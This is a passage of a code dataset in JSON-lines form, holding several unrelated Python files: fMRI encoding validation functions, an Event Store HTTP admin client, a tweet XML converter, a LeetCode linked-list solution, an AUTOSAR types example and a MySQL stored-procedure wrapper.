isinstance(self.n_components, int):\n pca = PCA(n_components=self.n_components)\n y_pred = self.models.predict(X)\n self.pca = pca.fit(y_pred)\n pca_y_pred, pca_y = (self._pca_transform(pcav) for pcav in [y_pred, y])\n self.pca_cov = np.cov(pca_y - pca_y_pred, rowvar=0)\n if self.pca_cov.shape == ():\n self.pca_cov = self.pca_cov[None, None]\n else:\n if self.scoring is None:\n self.scoring = self.score\n scores_dict = {}\n kfold = StratifiedKFold(n_splits=self.cv)\n for value in self.n_components:\n scores = []\n for train, test in kfold.split(X, labels):\n cv_mve = MultiVoxelEncoding(models=self.models, n_components=value, cv=None)\n cv_mve.fit(X[train, :], y[train, :])\n scores.append(\n np.sum(np.diag(mve_score(\n cv_mve, X[test, :], y[test,:], labels[test])[1]))/25.)\n scores_dict[value] = np.mean(scores)\n self.n_components = max(scores_dict, key=scores_dict.get)\n y_pred = self.models.predict(X)\n pca = PCA(n_components=self.n_components)\n pca.fit(y_pred)\n self.pca = pca\n pca_predy, pca_y = (self._pca_transform(pcav) for pcav in [y_pred,y])\n self.pca_cov = np.cov(pca_y - pca_predy,rowvar=0)\n\n 
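# NOTE: predict()/score() below operate in the PCA-reduced space learned by fit() above.\n    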
def predict(self, X):\n if self.pca is None:\n raise RuntimeError('must call \"fit\" first')\n return self._pca_transform(self.models.predict(X))\n\n def score(self, X, y):\n if self.pca is None:\n raise RuntimeError('must call \"fit\" first')\n return np.array(\n [multivariate_normal.logpdf(row[:, 0], row[:, 1],\n self.pca_cov)\n for row in np.dstack((self._pca_transform(y), self.predict(X)))])\n\ndef lognormalize2(x):\n a = np.max(x) + np.logaddexp.reduce(x-np.max(x))\n return np.exp(x-a)\n\ndef pdf_multi_normal(x, mean, cov):\n '''Multivariate normal pdf with three parts'''\n import numpy as np\n k = x.shape[0]\n part1 = np.exp(-0.5*k*np.log(2*np.pi))\n part2 = np.power(np.linalg.det(cov),-0.5)\n dev = x - mean\n part3 = np.exp(-0.5*np.dot(np.dot(dev.T,np.linalg.inv(cov)),dev))\n return part1 * part2 * part3\n\ndef score_diffcat(y_true, y_pred, labels, ctype='pearson'):\n '''Compute the rankscore (Santoro et al., 2014) of the data'''\n import numpy as np\n from scipy.stats import pearsonr,spearmanr,rankdata\n if ctype == 'pearson':\n cfunc = pearsonr\n else:\n cfunc = spearmanr\n ranks = np.zeros((y_pred.shape[0],))\n for i in xrange(y_pred.shape[0]):\n correlations = [cfunc(y_pred[i,:],y_true[j,:])[0] for j in xrange(y_true.shape[0]) if labels[j]!=labels[i]]\n correlations.append(cfunc(y_pred[i,:],y_true[i,:])[0])\n ranks[i] = ((rankdata(correlations)[-1])/(len(correlations)))\n return ranks\n\ndef binary_retrieval(y_true, y_pred, labels):\n '''Compute the binary retrieval accuracy (Mitchell et al., 2008) for the data'''\n import numpy as np\n def cosine_similarity(a,b):\n return np.dot(a,b)/(np.linalg.norm(a)*np.linalg.norm(b))\n match_acc = np.zeros((y_pred.shape[0],))\n for i in xrange(y_pred.shape[0]):\n match = 0.\n for j in xrange(y_pred.shape[0]):\n if labels[j] == labels[i]:\n continue\n score_true = cosine_similarity(y_pred[i,:],y_true[i,:]) + cosine_similarity(y_pred[j,:],y_true[j,:])\n score_false = cosine_similarity(y_pred[i,:],y_true[j,:]) + cosine_similarity(y_pred[j,:],y_true[i,:])\n if score_true > score_false:\n match += 1.\n match_acc[i] = match / np.sum(labels!=labels[i])\n return match_acc\n\ndef confmat_from_labels(mve, stimulus, fmri, labels):\n '''Returns a 25x25 confusion matrix'''\n probdist = np.zeros((25, 25))\n unique_labels = [genre + str(i) for genre in ['ambient', 'country', 'metal', 'rocknroll', 'symphonic'] for i in range(5)]\n for ilbl, lbl in enumerate(unique_labels):\n lbl_given_r = np.array([\n np.sum(mve.score(\n stimulus[np.where(labels==alt_lbl)[0],:],\n fmri[np.where(labels==lbl)[0],:])) if alt_lbl in np.unique(labels) else 0.\n for alt_lbl in unique_labels])\n probdist[ilbl,:] = lognormalize2(lbl_given_r)\n confmat = np.zeros((25, 25))\n for i in range(25):\n confmat[i, np.argmax(probdist[i])] = 1\n return confmat\n\n","sub_path":"code/validation_functions.py","file_name":"validation_functions.py","file_ext":"py","file_size_in_byte":10175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"91768451","text":"from future.standard_library import install_aliases\ninstall_aliases()\n\nfrom collections import namedtuple\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom urllib.parse import urljoin, urlparse\nimport uuid\n\n\nJSON=\"application/json\"\nATOM=\"application/vnd.eventstore.atom+json\"\nEVENTS=\"application/vnd.eventstore.events+json\"\nSTREAMDESC=\"application/vnd.eventstore.streamdesc+json\"\n\nUser = namedtuple(\n 'user', [\n 'login_name', 'full_name', 'disabled', 
'links', 'groups'])\n\ndef as_set(val):\n return set() if not val else set(val)\n\nclass Acl:\n\n def __init__(self, read=None, write=None, delete=None, metadata_read=None, metadata_write=None):\n self.read = read\n self.write = write\n self.delete = delete\n self.metadata_read = metadata_read\n self.metadata_write = metadata_write\n\n\n def __eq__(self, other):\n return (self.as_set(self.read) == self.as_set(other.read)\n and self.as_set(self.write) == self.as_set(other.write)\n and self.as_set(self.delete) == self.as_set(other.delete)\n and self.as_set(self.metadata_read) == self.as_set(other.metadata_read)\n and self.as_set(self.metadata_write) == self.as_set(other.metadata_write))\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n\n def to_dict(self):\n return {k:v for k,v in {\n \"$r\": self.read,\n \"$w\": self.write,\n \"$d\": self.delete,\n \"$mr\": self.metadata_read,\n \"$mw\": self.metadata_write\n }.items()\n if v is not None}\n\n @staticmethod\n def get_entry(v):\n if isinstance(v, str):\n return [v]\n return v\n\n @staticmethod\n def from_dict(data):\n return Acl(read = Acl.get_entry(data[\"$r\"]),\n write = Acl.get_entry(data[\"$w\"]),\n delete = Acl.get_entry(data[\"$d\"]),\n metadata_read = Acl.get_entry(data[\"$mr\"]),\n metadata_write = Acl.get_entry(data[\"$mw\"]))\n\n def coalesce(self, first, snd):\n return first if first is not None else snd\n\n def update(self, other):\n return Acl(\n read = self.coalesce(self.read, other.read),\n write = self.coalesce(self.write, other.write),\n delete = self.coalesce(self.delete, other.delete),\n metadata_read = self.coalesce(self.metadata_read, other.metadata_read),\n metadata_write = self.coalesce(self.metadata_write, other.metadata_write)\n )\n\n\n def merge(self, a, b):\n if not a:\n return b\n if not b:\n return a\n result = set(a)\n result.update(set(b))\n return sorted(list(result))\n\n def strip(self, a, b):\n if not a:\n return b\n if not b:\n return a\n result = set(a)\n result.difference_update(set(b))\n return sorted(list(result))\n\n\n def as_set(self, val):\n return set(val) if val else set()\n\n def grant(self, other):\n return Acl(\n read = self.merge(self.read, other.read),\n write = self.merge(self.write, other.write),\n delete = self.merge(self.delete, other.delete),\n metadata_read = self.merge(self.metadata_read, other.metadata_read),\n metadata_write = self.merge(self.metadata_write, other.metadata_write)\n )\n\n def revoke(self, other):\n return Acl(\n read = self.strip(self.read, other.read),\n write = self.strip(self.write, other.write),\n delete = self.strip(self.delete, other.delete),\n metadata_read = self.strip(self.metadata_read, other.metadata_read),\n metadata_write = self.strip(self.metadata_write, other.metadata_write)\n )\n\n def is_empty(self):\n return not any(self.to_dict())\n\n @staticmethod\n def empty():\n return Acl()\n\n @staticmethod\n def deny_all():\n return Acl(read=[], write=[], delete=[], metadata_read=[], metadata_write=[])\n\n\nDEFAULT_DEFAULT_ACL=(Acl(\n read=[\"$all\"],\n write=[\"$all\"],\n delete=[\"$all\"],\n metadata_read=[\"$all\"],\n metadata_write=[\"$all\"]),\n Acl(\n read=[\"$admins\"],\n write=[\"$admins\"],\n delete=[\"$admins\"],\n metadata_read=[\"$admins\"],\n metadata_write=[\"$admins\"]\n ))\n\nclass NotFoundException(Exception):\n pass\n\n\nclass AuthenticationException(Exception):\n pass\n\nclass UserManager:\n\n def __init__(self, client):\n self.client = client\n\n def create(self, username, password, fullname=None, groups=[]):\n 
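# Example (illustrative only; Event Store's default admin credentials assumed): Client('localhost', 2113, 'admin', 'changeit').users.create('alice', 's3cret', groups=['$admins'])\n        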
self.client.post('/users/',\n                {\n                    \"loginName\": username,\n                    \"password\": password,\n                    \"fullName\": fullname or username,\n                    \"groups\": groups\n                }, JSON)\n\n    def get(self, username):\n        response = self.client.get('/users/'+username, JSON)\n        if response.status_code == 404:\n            # Surface missing users with the module's NotFoundException.\n            raise NotFoundException()\n        data = response.json()['data']\n        return User(login_name=data['loginName'],\n                    full_name=data['fullName'],\n                    disabled=data['disabled'],\n                    groups=data['groups'],\n                    links={\n                        l['rel']: l['href'] for l in data['links']\n                    })\n\n    def delete(self, username):\n        user = self.get(username)\n        response = self.client.delete(user.links['delete'])\n        print(response)\n\n    def addgroup(self, username, *args):\n        user = self.get(username)\n        groups = set(user.groups)\n        groups.update(args)\n\n        response = self.client.put(user.links['edit'], {\n            \"fullName\": user.full_name,\n            \"groups\": list(groups)\n        }, JSON)\n\n    def removegroup(self, username, *args):\n        user = self.get(username)\n        groups = set(user.groups)\n        groups.difference_update(args)\n\n        response = self.client.put(user.links['edit'], {\n            \"fullName\": user.full_name,\n            \"groups\": list(groups)\n        }, JSON)\n\n    def rename(self, username, full_name):\n        user = self.get(username)\n        response = self.client.put(user.links['edit'], {\n            \"fullName\": full_name,\n            \"groups\": user.groups\n        }, JSON)\n\n    def setpassword(self, username, password):\n        user = self.get(username)\n        self.client.post(user.links['reset-password'], {\n            'newPassword': password\n        }, JSON)\n\n\nclass StreamManager:\n\n    def __init__(self, client):\n        self.client = client\n\n    def create(self, name, acl=Acl.empty(), eventid=None):\n        metadata = {\n            \"eventId\": str(eventid or uuid.uuid4()),\n            \"eventType\": \"settings\"\n        }\n        if not acl.is_empty():\n            metadata[\"data\"] = {\"$acl\": acl.to_dict()}\n\n        self.client.post(\"/streams/\"+name+\"/metadata\", [metadata], EVENTS)\n\n    def get_acl(self, name):\n        response = self.client.get('/streams/'+name+'/metadata', JSON)\n        data = response.json()\n        if \"$acl\" in data:\n            return Acl.from_dict(data[\"$acl\"])\n        return None\n\n\n    def set_acl(self, name, acl, eventid=None):\n        current = self.get_acl(name)\n        event = {\n            \"eventId\": str(eventid or uuid.uuid4()),\n            \"eventType\": \"settings\",\n            \"data\": {\n                \"$acl\": acl.to_dict()\n            }\n        }\n        self.client.post(\"/streams/\"+name+\"/metadata\", [event], EVENTS)\n\n    def delete(self, name):\n        self.client.delete('/streams/'+name)\n\n    def grant(self, stream, acl=Acl.empty(), eventid=None):\n        current = self.get_acl(stream) or Acl.empty()\n        new = current.grant(acl)\n        self.set_acl(stream, new, eventid)\n\n    def revoke(self, stream, acl=Acl.empty(), eventid=None):\n        current = self.get_acl(stream) or Acl.empty()\n        new = current.revoke(acl)\n        self.set_acl(stream, new, eventid)\n\n\nclass DefaultAclManager:\n\n    def __init__(self, client, is_system=False):\n        self.client = client\n        self.is_system = is_system\n\n    def get_acl(self):\n        try:\n            response = self.client.get('/streams/$settings', EVENTS)\n        except NotFoundException:\n            return DEFAULT_DEFAULT_ACL\n\n        latest = response.json()[\"entries\"][0]\n        acl = self.client.get(latest[\"id\"], JSON).json()\n        return(Acl.from_dict(acl[\"$userStreamAcl\"]),\n               Acl.from_dict(acl[\"$systemStreamAcl\"]))\n\n    def set_acl(self, acl, eventid=None):\n        user,system = self.get_acl()\n        if self.is_system:\n            system = acl.update(Acl.deny_all())\n        else:\n            user = acl.update(Acl.deny_all())\n\n        event = {\n            \"eventId\": str(eventid or uuid.uuid4()),\n            \"eventType\": \"settings\",\n            \"data\": {\n                \"$userStreamAcl\": 
user.to_dict(),\n \"$systemStreamAcl\": system.to_dict()\n }\n }\n self.client.post(\"/streams/$settings\", [event], EVENTS)\n\n def grant(self, acl=Acl.empty(), eventid=None):\n user, system = self.get_acl()\n current = system if self.is_system else user\n new = current.grant(acl)\n self.set_acl(new, eventid)\n\n def revoke(self, acl, eventid=None):\n user, system = self.get_acl()\n current = system if self.is_system else user\n new = current.revoke(acl)\n self.set_acl(new, eventid)\n\n\nclass SubscriptionManager:\n\n def __init__(self, client):\n self.client = client\n\n def get(self, group_name, stream):\n response = self.client.get('/subscriptions/{}/{}/info'.format(stream, group_name), JSON)\n\n data = response.json()\n\n return data\n\n def create(self,\n group_name,\n stream,\n resolve_link_tos=False,\n start_from=0,\n message_timeout=10000,\n extra_statistics=False,\n max_retry=10,\n live_buffer_size=500,\n buffer_size=500,\n read_batch_size=20,\n checkpoint_after=1000,\n min_checkpoint_count=10,\n max_checkpoint_count=500,\n max_subscriber_count=10,\n named_consumer_strategy=\"RoundRobin\"):\n\n self._validate_consumer_strategy(named_consumer_strategy)\n\n body = {\n \"checkpoints\": checkpoint_after,\n \"resolveLinktos\": resolve_link_tos,\n \"startFrom\": start_from,\n \"messageTimeoutMilliseconds\": message_timeout,\n \"extraStatistics\": extra_statistics,\n \"maxRetryCount\":max_retry,\n \"liveBufferSize\": live_buffer_size,\n \"bufferSize\": buffer_size,\n \"readBatchSize\": read_batch_size,\n \"checkPointAfterMilliseconds\": checkpoint_after,\n \"minCheckPointCount\": min_checkpoint_count,\n \"maxCheckPointCount\": max_checkpoint_count,\n \"maxSubscriberCount\": max_subscriber_count,\n \"namedConsumerStrategy\": named_consumer_strategy}\n\n\n response = self.client.put(\n \"/subscriptions/{}/{}\".format(stream, group_name),\n body,\n JSON)\n\n return body\n\n def delete(self, group_name, stream):\n self.client.delete('/subscriptions/{}/{}'.format(stream, group_name))\n\n def update(self,\n group_name,\n stream,\n resolve_link_tos=None,\n start_from=None,\n message_timeout=None,\n extra_statistics=None,\n max_retry=None,\n live_buffer_size=None,\n buffer_size=None,\n read_batch_size=None,\n checkpoint_after=None,\n min_checkpoint_count=None,\n max_checkpoint_count=None,\n max_subscriber_count=None,\n named_consumer_strategy=None):\n\n current = self.get(group_name, stream)['config']\n\n strategy = current['namedConsumerStrategy'] if named_consumer_strategy is None else named_consumer_strategy\n self._validate_consumer_strategy(strategy)\n\n body = {\n \"checkpoints\": current['checkPointAfterMilliseconds'] if checkpoint_after is None else checkpoint_after,\n \"resolveLinktos\": current['resolveLinktos'] if resolve_link_tos is None else resolve_link_tos,\n \"startFrom\": current['startFrom'] if start_from is None else start_from,\n \"messageTimeoutMilliseconds\": current['messageTimeoutMilliseconds'] if message_timeout is None else message_timeout,\n \"extraStatistics\": current['extraStatistics'] if extra_statistics is None else extra_statistics,\n \"maxRetryCount\": current['maxRetryCount'] if max_retry is None else max_retry,\n \"liveBufferSize\": current['liveBufferSize'] if live_buffer_size is None else live_buffer_size,\n \"bufferSize\": current['bufferSize'] if buffer_size is None else buffer_size,\n \"readBatchSize\": current['readBatchSize'] if read_batch_size is None else read_batch_size,\n \"checkPointAfterMilliseconds\": current['checkPointAfterMilliseconds'] if 
checkpoint_after is None else checkpoint_after,\n            \"minCheckPointCount\": current['minCheckPointCount'] if min_checkpoint_count is None else min_checkpoint_count,\n            \"maxCheckPointCount\": current['maxCheckPointCount'] if max_checkpoint_count is None else max_checkpoint_count,\n            \"maxSubscriberCount\": current['maxSubscriberCount'] if max_subscriber_count is None else max_subscriber_count,\n            \"namedConsumerStrategy\": strategy}\n\n\n        response = self.client.post(\n            \"/subscriptions/{}/{}\".format(stream, group_name),\n            body,\n            JSON)\n\n        return {\n            \"old_config\": current,\n            \"new_config\": body}\n\n    def _validate_consumer_strategy(self, strategy):\n        VALID_CONSUMER_STRATEGIES = [\n            \"RoundRobin\",\n            \"DispatchToSingle\",\n            \"Pinned\"]\n\n        if strategy not in VALID_CONSUMER_STRATEGIES:\n            raise ValueError(\"Named Strategy {} is not recognised\".format(strategy))\n\n\nclass Client:\n\n    def __init__(self, host, port, username, password, no_ssl=False):\n        scheme = \"http\" if no_ssl else \"https\"\n        self.base_uri = \"{0}://{1}:{2}\".format(scheme, host, port)\n        self.users = UserManager(self)\n        self.streams = StreamManager(self)\n        self.user_acl = DefaultAclManager(self)\n        self.system_acl = DefaultAclManager(self, is_system=True)\n        self.subscriptions = SubscriptionManager(self)\n        self.username = username\n        self.password = password\n\n    def __handle(self, r):\n        if r.status_code == 401:\n            raise AuthenticationException()\n        if r.status_code == 404:\n            raise NotFoundException()\n        r.raise_for_status()\n        return r\n\n    def get_uri(self, path):\n        return urljoin(self.base_uri, str(path))\n\n    def post(self, path, body, content_type):\n        response = requests.post(\n            self.get_uri(path),\n            json=body,\n            auth=HTTPBasicAuth(\n                self.username,\n                self.password),\n            headers={\n                'Content-Type': content_type})\n        return self.__handle(response)\n\n    def get(self, path, content_type):\n        return self.__handle(requests.get(self.get_uri(path)+'?embed=tryharder',\n                             auth=HTTPBasicAuth(self.username, self.password),\n                             headers={\n                                 'Accept': content_type\n                             }))\n\n    def put(self, path, body, content_type):\n        return self.__handle(requests.put(self.get_uri(path),\n                             auth=HTTPBasicAuth(self.username, self.password),\n                             json=body,\n                             headers={\n                                 'Content-Type': content_type\n                             }))\n\n    def delete(self, path):\n        return self.__handle(requests.delete(self.get_uri(path),\n                             auth=HTTPBasicAuth(\n                                 self.username,\n                                 self.password)))\n\n    @staticmethod\n    def from_uri(uri, username, password):\n        parts = urlparse(uri)\n        return Client(parts.hostname, parts.port, username, password,\n                      no_ssl=(parts.scheme == \"http\"))\n","sub_path":"ouroboros/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":16699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"3011760","text":"#%%\nfrom logging import getLogger , NullHandler\nimport xml.etree.ElementTree as ET\n\n#%%\nclass XmlToTweets:\n\n    \n    def __init__(self,xmlfilepath,*,logger=None):\n        __logger = getLogger(__name__)\n        __logger.addHandler(NullHandler())\n        logger = logger or __logger\n        try:\n            with open(xmlfilepath,\"r\",encoding=\"utf-8\") as f:\n                self.XmlString = f.read()\n        except FileNotFoundError:\n            logger.error(\"FileNotFoundError{0}\".format(xmlfilepath))\n            raise\n    \n    def tweets_to_xml(self,path,tweets):\n        root = ET.Element(\"tweets\")\n        for tweet in tweets:\n            tweetElement = ET.SubElement(root,\"tweet\")\n            tweetElement.set(\"id\",tweet[\"id\"])\n            textElement = ET.SubElement(tweetElement,\"text\")\n            textElement.text = tweet[\"text\"]\n            
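# Keep the tokenised (wakati) form of the tweet next to its raw text element.\n            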
wakatiElement = ET.SubElement(tweetElement,\"wakati\")\n wakatiElement.text = tweet[\"wakati\"]\n with open(path,\"w\",encoding=\"utf-8\") as f:\n et = ET.ElementTree(root)\n et.write(f,encoding=\"unicode\")\n\n def xml_to_tweets(self,limit=0,*,exclude_wakati=False,exclude_text=False,logger=None):\n __logger = getLogger(__name__)\n __logger.addHandler(NullHandler())\n logger = logger or __logger\n try:\n root = ET.fromstring(self.XmlString)\n except ET.ParseError as e:\n logger.error(e.args)\n\n tweets = []\n c = 0\n for element in root.getchildren():\n tweet = dict()\n tweet[\"id\"] = element.items()[0][1]\n logger.info(\"Now target: {0}\".format(tweet[\"id\"]))\n for subelement in element.getchildren():\n if subelement.tag == \"wakati\" and not exclude_wakati:\n tweet[\"wakati\"] = subelement.text\n elif subelement.tag == \"text\" and not exclude_text:\n tweet[\"text\"] = subelement.text\n tweets.append(tweet)\n c = c + 1\n if limit != 0 and c >= limit:\n break\n\n return tweets\n\n#%%\nif __name__ == \"__main__\":\n from logging import getLogger, StreamHandler, DEBUG\n logger = getLogger(__name__)\n logger.setLevel(DEBUG)\n handler = StreamHandler()\n handler.setLevel(DEBUG)\n logger.addHandler(handler)\n logger.propagate = False\n\n X2T = XmlToTweets(\"get_tweets/AbeShinzo/tweets.xml\",logger=logger)\n l = X2T.xml_to_tweets(2)\n print(l[0])\n ","sub_path":"get_tweets/xml_to_tweet.py","file_name":"xml_to_tweet.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"348772386","text":"# Write a program to find the node at which the intersection of two singly\n# linked lists begins.\n# \n# \n# For example, the following two linked lists:\n# \n# A: a1 -> a2\n# c1 -> c2 -> c3\n# B: b1 -> b2 -> b3\n# begin to intersect at node c1.\n# \n# \n# Notes:\n# \n# If the two linked lists have no intersection at all, return null.\n# The linked lists must retain their original structure after the function\n# returns.\n# You may assume there are no cycles anywhere in the entire linked structure.\n# Your code should preferably run in O(n) time and use only O(1) memory.\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if not headA or not headB:\n return None\n\n a = headA\n b = headB\n\n tail_A = None\n tail_B = None\n while True:\n if not a:\n a = headB\n if not b:\n b = headA\n if not a.next:\n tail_A = a\n if not b.next:\n tail_B = b\n if tail_A and tail_B and tail_A != tail_B:\n return None\n if a == b:\n return a\n a = a.next\n b = b.next\n","sub_path":"src/leetcode/LC_160_intersection_of_two_linked_list.py","file_name":"LC_160_intersection_of_two_linked_list.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"598292129","text":"dev_mode = False\nif dev_mode:\n import os, sys\n sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../..')))\nimport autosar\n\ndef create_autosar_platform(ws):\n package = ws.createPackage('AUTOSAR_Platform')\n baseTypes = package.createSubPackage('BaseTypes', role='DataType')\n package.createSubPackage('CompuMethods', role='CompuMethod')\n package.createSubPackage('DataConstrs', role='DataConstraint')\n implTypes = package.createSubPackage('ImplementationDataTypes')\n baseTypes.createSwBaseType('dtRef_const_VOID', 1, encoding = 'VOID', nativeDeclaration = 
'void')\n    baseTypes.createSwBaseType('dtRef_VOID', 1, encoding = 'VOID', nativeDeclaration = 'void')\n    baseTypes.createSwBaseType('boolean', 8, encoding = 'BOOLEAN', nativeDeclaration='boolean')\n    baseTypes.createSwBaseType('float32', 32, encoding = 'IEEE754', nativeDeclaration = 'float32')\n    baseTypes.createSwBaseType('float64', 64, encoding = 'IEEE754', nativeDeclaration = 'float64')\n    baseTypes.createSwBaseType('sint8', 8, encoding = '2C', nativeDeclaration='sint8')\n    baseTypes.createSwBaseType('sint16', 16, encoding = '2C', nativeDeclaration='sint16')\n    baseTypes.createSwBaseType('sint32', 32, encoding = '2C', nativeDeclaration='sint32')\n    baseTypes.createSwBaseType('uint8', 8, nativeDeclaration='uint8')\n    baseTypes.createSwBaseType('uint16', 16, nativeDeclaration='uint16')\n    baseTypes.createSwBaseType('uint32', 32, nativeDeclaration='uint32')\n    ws.setRole(implTypes.ref, 'DataType')\n    implTypes.createImplementationDataTypePtr('dtRef_const_VOID', '/AUTOSAR_Platform/BaseTypes/dtRef_const_VOID', swImplPolicy = 'CONST')\n    implTypes.createImplementationDataTypePtr('dtRef_VOID', '/AUTOSAR_Platform/BaseTypes/dtRef_VOID')\n    implTypes.createImplementationDataType('boolean', '/AUTOSAR_Platform/BaseTypes/boolean', valueTable=['FALSE', 'TRUE'], typeEmitter='Platform_Type')\n    implTypes.createImplementationDataType('uint8', '/AUTOSAR_Platform/BaseTypes/uint8', lowerLimit=0, upperLimit=255, typeEmitter='Platform_Type')\n    implTypes.createImplementationDataType('uint16', '/AUTOSAR_Platform/BaseTypes/uint16', lowerLimit=0, upperLimit=65535, typeEmitter='Platform_Type')\n    implTypes.createImplementationDataType('uint32', '/AUTOSAR_Platform/BaseTypes/uint32', lowerLimit=0, upperLimit=4294967295, typeEmitter='Platform_Type')\n\nif __name__ == '__main__':\n    ws = autosar.workspace(\"4.2.2\")\n    create_autosar_platform(ws)\n    autosar.util.createDcf(ws).save(dest_dir = 'autosar4', dcf_name = 'PlatformExample', file_map = {'AUTOSAR_Platform': {'root': 'DATATYPE', 'filters': ['/AUTOSAR_Platform']}})\n    print(\"Done\")\n","sub_path":"examples/autosar4/davinci/platform_types.py","file_name":"platform_types.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"175907930","text":"# -*- coding: utf-8 -*-\r\n# author:shihua\r\n# coder:shihua\r\n# A concrete composite-pattern implementation module, used to implement the various concrete features.\r\n\"\"\"\r\nModule description\r\n------------------\r\n\r\n    A concrete composite-pattern implementation module, used to implement the various concrete features.\r\n\r\nFeatures\r\n--------\r\n\r\n    Features implemented by single components: \r\n\r\n    (1) DataBaseConnect \r\n\r\n    (2) StoreProcedureCall \r\n\r\n    Features implemented by composite components: \r\n\r\n    (1) DataBaseConnect \r\n\r\n    (2) StoreProcedureCall \r\n\r\nClass notes\r\n-----------\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n####### Load packages ######################################################\r\n############################################################################\r\n\r\n\r\n\r\nfrom abc import ABCMeta,abstractmethod\r\nfrom DataAPI.composite_mode_base import *\r\nfrom DataAPI.assist_base import *\r\nimport pymysql\r\nimport pandas as pd\r\n\r\n\r\n\r\n####### Composite-pattern implementation classes ###########################\r\n### Features implemented by single components: ###\r\n### (1) DataBaseConnect ###\r\n### (2) StoreProcedureCall ###\r\n### Features implemented by composite components: ###\r\n### (1) DataBaseConnect ###\r\n### (2) StoreProcedureCall ###\r\n############################################################################\r\n\r\n\r\n\r\n####### Component implementation classes ####################################################\r\n############################################################################################\r\n\r\n\r\n\r\nclass Component_DataBaseConnect(Component):\r\n    \"\"\"\r\n    Class description:\r\n\r\n        A single-feature component for database connections.\r\n        Supported databases:\r\n        (1) MySQL\r\n    \"\"\"\r\n\r\n\r\n    def getInstanceName(self):\r\n        \"\"\"\r\n        Method purpose:\r\n\r\n            Return the name of this component implementation class.\r\n\r\n        Returns:\r\n            (str): instance name of the component implementation class\r\n        \"\"\"\r\n\r\n        return 'DataBaseConnect'\r\n\r\n\r\n    def feature(self,**kwargs):\r\n        \"\"\"\r\n        Method purpose:\r\n\r\n            Concrete implementation of the database connection.\r\n\r\n        Args:\r\n            DataBaseConnect_config_dict (Dict): database connection configuration\r\n\r\n        Returns:\r\n            None: the connection and cursor are published as globals for the composite component\r\n        \"\"\"\r\n\r\n        print(\"Component_DataBaseConnect Done!\")\r\n        ### Fetch the database connection configuration\r\n        DataBaseConnect_config_kwargs = kwargs['DataBaseConnect_config_dict']\r\n        ### Create the MySQL connection\r\n        global cursor\r\n        global connect\r\n        connect = pymysql.Connect(**DataBaseConnect_config_kwargs)\r\n        ### Obtain a cursor\r\n        cursor = connect.cursor()\r\n\r\n\r\n\r\nclass Component_StoreProcedureCall(Component):\r\n    \"\"\"\r\n    Class description:\r\n\r\n        A concrete implementation class for stored-procedure calls.\r\n    \"\"\"\r\n\r\n\r\n    def __init__(self):\r\n        \"\"\"\r\n        Attribute purpose:\r\n\r\n            Define an attribute that stores the component's data.\r\n        \"\"\"\r\n        self.data = None\r\n\r\n\r\n    def getInstanceName(self):\r\n        \"\"\"\r\n        Method purpose:\r\n\r\n            Return the name of this component implementation class.\r\n\r\n        Returns:\r\n            str: instance name of the component implementation class\r\n        \"\"\"\r\n\r\n        return 'StoreProcedureCall'\r\n\r\n\r\n    def feature(self,**kwargs):\r\n        \"\"\"\r\n        Method purpose:\r\n\r\n            Concrete implementation of a stored-procedure call.\r\n\r\n        Args:\r\n            InputParameters_dict (Dict): the stored procedure's input args and its name procname\r\n\r\n        Returns:\r\n            data (DataFrame): the result set returned by the stored procedure\r\n        \"\"\"\r\n\r\n        print(\"Component_StoreProcedureCall Done!\")\r\n        ### Fetch the prepared cursor\r\n        StoreProcedureCall_cursor = kwargs['cursor']\r\n        InputParameters_dict = kwargs['InputParameters_dict']\r\n        args= InputParameters_dict['args']\r\n        procname = InputParameters_dict['procname']\r\n        StoreProcedureCall_cursor.callproc(procname = procname, args= args)\r\n        # Fetch the result set, i.e. the result of SELECT * FROM tmp; inside the stored routine\r\n        result = cursor.fetchall()\r\n        columnDes = cursor.description # column descriptions from the connection object\r\n        columnNames = [columnDes[i][0] for i in range(len(columnDes))]\r\n        data = pd.DataFrame.from_records(result,columns = columnNames)\r\n        # print(data)\r\n\r\n        return data\r\n\r\n\r\n\r\n####### Composite component implementation classes ##########################################\r\n############################################################################################\r\n\r\n\r\n\r\nclass Composite_DataBaseConnect(Composite):\r\n    \"\"\"\r\n    Class description:\r\n\r\n        A composite component for database connections.\r\n        Supported databases:\r\n        (1) MySQL\r\n    \"\"\"\r\n\r\n\r\n    def feature(self,run_mode,**kwargs):\r\n        \"\"\"\r\n        Method purpose:\r\n\r\n            Concrete implementation of the database connection;\r\n            the connection objects are stored on the composite's result attribute.\r\n        \"\"\"\r\n\r\n        super().feature(run_mode,**kwargs)\r\n        self._result['connect'] = connect\r\n        self._result['cursor'] = cursor \r\n        print(self._result)\r\n\r\n\r\n\r\nclass Composite_StoreProcedureCall(Composite):\r\n    \"\"\"\r\n    Class description:\r\n\r\n        A composite component for stored-procedure calls.\r\n    \"\"\"\r\n\r\n\r\n    def feature(self,run_mode,**kwargs):\r\n        \"\"\"\r\n        Method purpose:\r\n\r\n            Execute the various stored procedures of this composite component.\r\n        \"\"\"\r\n\r\n        super().feature(run_mode,**kwargs)\r\n\r\n\r\n\r\n############################################################################################################\r\n############################################################################################################\r\n\r\n\r\n","sub_path":"Packages/DataAPI/DataAPI/composite_mode_realization.py","file_name":"composite_mode_realization.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"91904934","text":"import re\r\n\r\nwith open('dataset_3363_2.txt', 'r') as inf:\r\n    x = 
